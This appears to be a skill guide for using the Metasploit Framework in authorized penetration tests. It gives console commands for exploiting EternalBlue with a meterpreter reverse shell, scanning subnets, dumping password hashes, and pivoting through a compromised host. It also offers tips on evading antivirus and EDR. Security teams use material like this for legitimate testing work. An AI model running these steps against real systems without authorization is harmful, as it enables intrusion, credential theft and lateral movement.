Comprehensive Metasploit Framework

Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation and pivoting. This skill covers module selection, payload generation, session management, auxiliary scanning, post-exploitation data collection, and custom exploit development for authorized security assessments.

When to Use This Skill

Choose Comprehensive Metasploit Framework when you need to:

• Exploit known vulnerabilities with reliable, tested exploits
• Generate payloads for authorized penetration testing
• Manage multiple compromised sessions and pivot through networks
• Run auxiliary scans (port scanning, service enumeration, credential testing)

Consider alternatives when:

• You need web application-specific testing (use Burp Suite)
• You need custom exploit development from scratch (use pwntools)
• You need automated vulnerability scanning without exploitation (use Nessus or OpenVAS)

Quick Start

Copy
# Start Metasploit console
msfconsole

# Basic workflow: search, configure, exploit
msf6> search type:exploit name:eternalblue
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.100
msf6> set LHOST 192.168.1.50
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> check
msf6> exploit

# Alternative: use msfconsole with resource scripts
# msfconsole -r automation_script.rc

Copy
# Python interface to Metasploit via REST API
import requests
import json
import time

class MetasploitRPC:
    """Interface with Metasploit's RPC API."""

    def __init__(self, host='127.0.0.1', port=55553, password='msf'):
        self.url = f"http://{host}:{port}/api/v1"
        self.token = self._authenticate(password)

    def _authenticate(self, password):
        resp = requests.post(f"{self.url}/auth/login",
                             json={"username": "msf", "password": password})
        return resp.json().get('token')

    def _call(self, endpoint, data=None):
        headers = {"Authorization": f"Bearer {self.token}"}
        if data:
            resp = requests.post(f"{self.url}/{endpoint}",
                                 json=data, headers=headers)
        else:
            resp = requests.get(f"{self.url}/{endpoint}",
                                headers=headers)
        return resp.json()

    def list_sessions(self):
        return self._call("sessions")

    def list_jobs(self):
        return self._call("jobs")

# msf = MetasploitRPC(password='your_password')
# print(msf.list_sessions())

Core Concepts

Module Types

Type	Purpose	Example
Exploits	Deliver payloads via vulnerabilities	exploit/windows/smb/ms17_010_eternalblue
Payloads	Code executed after exploitation	windows/meterpreter/reverse_tcp
Auxiliary	Scanning, fuzzing, DoS (non-exploit)	auxiliary/scanner/portscan/tcp
Post	Post-exploitation modules	post/windows/gather/hashdump
Encoders	Obfuscate payloads	encoder/x86/shikata_ga_nai
Nops	No-operation padding	nop/x86/single_byte
Evasion	AV evasion techniques	evasion/windows/windows_defender_exe

Common Metasploit Workflow

Copy
# 1. Reconnaissance with auxiliary modules
msf6> use auxiliary/scanner/portscan/tcp
msf6> set RHOSTS 192.168.1.0/24
msf6> set THREADS 20
msf6> run

# 2. Service enumeration
msf6> use auxiliary/scanner/smb/smb_version
msf6> set RHOSTS 192.168.1.0/24
msf6> run

# 3. Vulnerability scanning
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> set RHOSTS 192.168.1.100
msf6> run

# 4. Exploitation
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.100
msf6> set LHOST 192.168.1.50
msf6> exploit

# 5. Post-exploitation (from meterpreter session)
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump
meterpreter> run post/multi/recon/local_exploit_suggester

# 6. Pivoting through compromised host
meterpreter> run autoroute -s 10.0.0.0/24
meterpreter> background
msf6> use auxiliary/server/socks_proxy
msf6> set SRVPORT 1080
msf6> run -j
# Now use proxychains to access 10.0.0.0/24 through the pivot

Configuration

Parameter	Description	Default
RHOSTS	Target host(s) or network	Required
RPORT	Target port	Module-specific
LHOST	Local host for reverse connections	Auto-detected
LPORT	Local port for reverse listener	4444
PAYLOAD	Payload to deliver	Module default
THREADS	Concurrent threads for scanning	1
WORKSPACE	Metasploit workspace name	"default"
VERBOSE	Verbose output	false

Best Practices

1. Use workspaces to organize engagements — Create a workspace for each client or engagement: workspace -a client_name. This keeps hosts, services, credentials, and loot separated between projects and prevents data leakage between assessments.

2. Always run check before exploit — The check command verifies whether the target is vulnerable without sending the exploit payload. This avoids crashing services unnecessarily and confirms the vulnerability before exploitation. Not all modules support check, but use it when available.

3. Prefer staged payloads for reliability — Staged payloads (windows/meterpreter/reverse_tcp) send a small stager first, then download the full payload. They're more reliable across network conditions than stageless payloads (windows/meterpreter_reverse_tcp), which send everything in one shot.

4. Use the database to track findings — Metasploit's database stores hosts, services, vulnerabilities, and credentials found during the engagement. Use hosts, services, vulns, and creds commands to review collected data. Export with db_export for reporting.

5. Clean up after testing — Remove any payloads, backdoors, or persistence mechanisms installed during testing. Use sessions -K to kill all sessions and document any artifacts that may remain on target systems. Provide cleanup details in the final report.

Common Issues

Exploit fails with "Exploit completed, but no session was created" — The exploit executed but the payload couldn't connect back. Common causes: firewall blocking the reverse connection, wrong LHOST (use your VPN/tunnel IP), antivirus killing the payload, or wrong payload architecture (x86 vs x64).

Meterpreter session dies immediately after connection — Antivirus or EDR is detecting and killing the payload. Try a different payload type (use meterpreter/reverse_https which is harder to detect), encode the payload, or use evasion modules. For modern environments, custom payloads may be necessary.

Database connection fails on startup — Metasploit requires PostgreSQL. Start the database service: sudo msfdb init then sudo msfdb start. If the database is corrupted, reinitialize with sudo msfdb reinit. Check connection with db_status in msfconsole.